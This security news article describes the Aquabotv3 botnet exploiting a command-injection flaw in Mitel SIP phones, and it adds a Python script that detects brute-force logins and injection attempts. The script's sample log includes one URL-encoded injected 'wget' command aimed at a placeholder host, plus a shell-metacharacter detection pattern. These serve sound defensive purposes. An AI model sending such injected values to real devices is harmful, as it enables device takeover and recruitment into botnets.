
A third variant of the Mirai-based Aquabot malware (Aquabotv3) has emerged, actively exploiting a command injection vulnerability (CVE-2024-41710) in Mitel SIP phones. Discovered by Akamai’s Security Intelligence and Response Team, this latest iteration introduces advanced monitoring capabilities that track termination attempts and report them to command-and-control (C2) servers.
The vulnerability affects Mitel’s 6800, 6900, and 6900w Series SIP phones, commonly deployed in corporate, government, healthcare, and financial sectors. Although classified as medium-severity, the flaw lets an authenticated attacker with admin privileges execute arbitrary commands, because a parameter is insufficiently sanitized during the boot process.
Attack Methodology:
– Initiates brute-force attacks to gain authentication
– Targets vulnerable endpoint 8021xsupport.html
– Injects malicious code into the phone’s configuration
– Downloads and installs architecture-specific payloads
– Establishes persistence and connects to C2 servers
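The first three steps above (brute-forcing the admin login, then posting a command-injection payload to 8021xsupport.html) leave a recognisable trace in the phone's web-access logs. The following Python script, added here as an illustration and not code from Akamai or Mitel, runs two simple detection rules over constructed sample log lines: repeated failed logins from one source within a short window, and shell metacharacters inside a parameter value sent to the vulnerable endpoint. The log format, the login path (/login.html) and the parameter names (mode, identity) are assumptions; only the 8021xsupport.html endpoint comes from the report.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified access-log format:
#   <timestamp> <client IP> <method> <path> <status> <request body>
# None of these come from a real phone or from any published IoC list.
SAMPLE_LOG = """\
2025-01-29T10:00:01Z 203.0.113.7 POST /login.html 401 username=admin&password=admin
2025-01-29T10:00:02Z 203.0.113.7 POST /login.html 401 username=admin&password=1234
2025-01-29T10:00:03Z 203.0.113.7 POST /login.html 401 username=admin&password=password
2025-01-29T10:00:04Z 203.0.113.7 POST /login.html 401 username=admin&password=mitel
2025-01-29T10:00:05Z 203.0.113.7 POST /login.html 401 username=admin&password=admin123
2025-01-29T10:00:06Z 203.0.113.7 POST /login.html 200 username=admin&password=REDACTED
2025-01-29T10:00:09Z 203.0.113.7 POST /8021xsupport.html 200 mode=eap%3Bwget+http%3A%2F%2Fexample.invalid%2Fx
2025-01-29T10:05:00Z 198.51.100.20 POST /login.html 200 username=admin&password=REDACTED
2025-01-29T10:05:10Z 198.51.100.20 POST /8021xsupport.html 200 mode=eap&identity=phone01
"""

LOGIN_PATH = "/login.html"            # assumed admin login endpoint (hypothetical name)
VULN_PATH = "/8021xsupport.html"      # endpoint named in the report
BRUTE_THRESHOLD = 5                   # this many failed logins from one IP ...
BRUTE_WINDOW = timedelta(seconds=60)  # ... inside this window triggers an alert
# Shell metacharacters that have no business in a phone configuration value.
# '&' is deliberately excluded because it is the normal parameter separator.
SHELL_META = re.compile(r"[;|`]|\$\(|\n")


def parse_line(line):
    """Split one access-log line into its fields; the body may be absent."""
    parts = line.split(" ", 5)
    if len(parts) == 5:
        parts.append("")
    ts, ip, method, path, status, body = parts
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ip": ip, "method": method, "path": path,
        "status": int(status), "body": body,
    }


def suspicious_values(body):
    """Return (key, decoded value) pairs whose value contains shell metacharacters.

    Values are URL-decoded first, so an encoded ';' (%3B) is caught as well.
    """
    hits = []
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        decoded = unquote_plus(value)
        if SHELL_META.search(decoded):
            hits.append((unquote_plus(key), decoded))
    return hits


def analyze(log_text):
    """Run both rules over the log and return alerts in the order they fire."""
    alerts = []
    failures = defaultdict(lambda: deque(maxlen=BRUTE_THRESHOLD))
    brute_alerted = set()

    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)

        # Rule 1: brute force against the login page.
        if rec["path"] == LOGIN_PATH and rec["status"] == 401:
            window = failures[rec["ip"]]
            window.append(rec["ts"])
            if (len(window) == BRUTE_THRESHOLD
                    and window[-1] - window[0] <= BRUTE_WINDOW
                    and rec["ip"] not in brute_alerted):
                brute_alerted.add(rec["ip"])
                alerts.append({"rule": "brute_force", "ip": rec["ip"],
                               "detail": f"{BRUTE_THRESHOLD} failed logins "
                                         f"within {BRUTE_WINDOW.seconds}s"})

        # Rule 2: metacharacters in a value sent to the vulnerable endpoint.
        if rec["path"] == VULN_PATH:
            for key, value in suspicious_values(rec["body"]):
                alerts.append({"rule": "command_injection", "ip": rec["ip"],
                               "detail": f"parameter {key!r} contains {value!r}"})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(f"[{alert['rule']}] {alert['ip']}: {alert['detail']}")
```

Because the vulnerability requires admin credentials, the brute-force rule is the earlier and cheaper signal; the injection rule then confirms that the compromised session was used against the boot-time configuration parameter. Both rules are intentionally simple and would be tuned to the real log format and to legitimate provisioning traffic before deployment.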
The botnet’s propagation strategy includes exploiting multiple vulnerabilities across various IoT devices, including:
– TP-Link devices (CVE-2018-17532)
– IoT firmware (CVE-2023-26801)
– Web applications (CVE-2022-31137)
– Linksys E-series
– Hadoop YARN
– Dasan routers
Aquabotv3’s primary objective is building a DDoS network capable of launching TCP SYN, TCP ACK, UDP, GRE IP, and application-layer attacks. The operation is marketed on Telegram under various names, including Cursinq Firewall and The Eye Services, supposedly as a DDoS testing tool.
Akamai has released detection rules and indicators of compromise to help organizations identify and mitigate this threat.